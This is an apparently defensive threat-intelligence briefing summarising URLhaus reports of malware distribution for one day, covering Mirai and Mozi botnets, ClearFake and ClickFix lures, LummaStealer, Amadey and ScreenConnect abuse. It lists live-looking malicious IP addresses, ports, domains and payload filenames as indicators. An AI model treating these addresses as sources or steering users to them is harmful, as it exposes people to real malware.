This briefing covers threat intelligence for May 3, 2026, focusing exclusively on malware distribution infrastructure identified through URLhaus reporting. The analysis reveals 49 malicious URLs associated with multiple ongoing malware campaigns, with particular emphasis on IoT-targeting botnets and social engineering frameworks. No critical vulnerabilities, KEV additions, or infrastructure seizure events were reported during this period.
The threat landscape for this date is dominated by three primary malware families: Mozi botnet (10 instances), Mirai variants (17 instances), and ClearFake social engineering framework (13 instances). Additional threats include LummaStealer, CoinMiner, and ClickFix campaigns. The prevalence of IoT-targeting malware indicates sustained efforts by threat actors to compromise embedded devices and routers across multiple architectures. The ClearFake campaign demonstrates sophisticated social engineering tactics designed to deceive users into executing malicious PowerShell scripts, while ConnectWise ScreenConnect abuse suggests ongoing attempts to leverage legitimate remote administration tools for malicious purposes.
Significant botnet activity targeting IoT devices and embedded systems across multiple architectures, primarily Mozi and Mirai variants.
Ten Mozi botnet distribution URLs identified targeting MIPS architecture devices. This P2P botnet continues to propagate through vulnerable routers and IoT devices, with infrastructure hosted on Asian IP ranges (27.x.x.x, 123.x.x.x, 110.x.x.x, 39.x.x.x).
Seventeen Mirai variant URLs detected on 176.65.139.x subnet targeting multiple architectures including ARM, MIPS, x86, PowerPC, SPARC, ARC, and M68K. The 'iran.*' naming convention suggests potential targeting or attribution themes. Distribution infrastructure utilizes shell scripts for initial access.
Secondary Mirai distribution identified on 80.67.33.209:54118 and related ELF payloads on 80.241.218.210 with 'wowiloveyou' campaign markers and 176.65.139.165 hosting MIPS variants.
ClearFake framework and information stealing malware actively distributed through compromised infrastructure and social engineering techniques.
Thirteen ClearFake distribution URLs identified across multiple domains (woodfor.lat, toorout.lat, agilelid.lat) using consistent UUID-based URI patterns (9fd51fb7-b3ad-4c8f-bf05-b5423d14e06c). This framework delivers fake browser update prompts to execute malicious PowerShell payloads, representing a sophisticated social engineering attack chain.
LummaStealer infostealer identified on 176.65.139.141 infrastructure distributing bot_x86.exe variant. LummaStealer is known for credential harvesting, browser data theft, and cryptocurrency wallet targeting.
ClickFix campaign identified using domain sandman.lat for PowerShell-based payload delivery, likely leveraging social engineering to trick users into executing clipboard-based attacks.
Miscellaneous malware distribution including cryptocurrency miners, Amadey-dropped payloads, and ConnectWise ScreenConnect abuse.
Amadey dropper infrastructure detected on 62.60.226.140 distributing secondary payloads (RMRcoQ0.exe). Amadey is a modular botnet commonly used as initial access loader for subsequent malware deployment including ransomware and infostealers.
Cryptocurrency mining malware distributed via fake screensaver file (Photo.scr) from 176.65.139.124:8081. The .scr extension disguises executable payload as a screensaver to evade user suspicion.
Four URLs identified distributing ConnectWise ScreenConnect clients from suspicious infrastructure (192.159.99.39, 185.241.208.243:9090). Legitimate remote administration tools are frequently abused by threat actors for persistent remote access and command execution.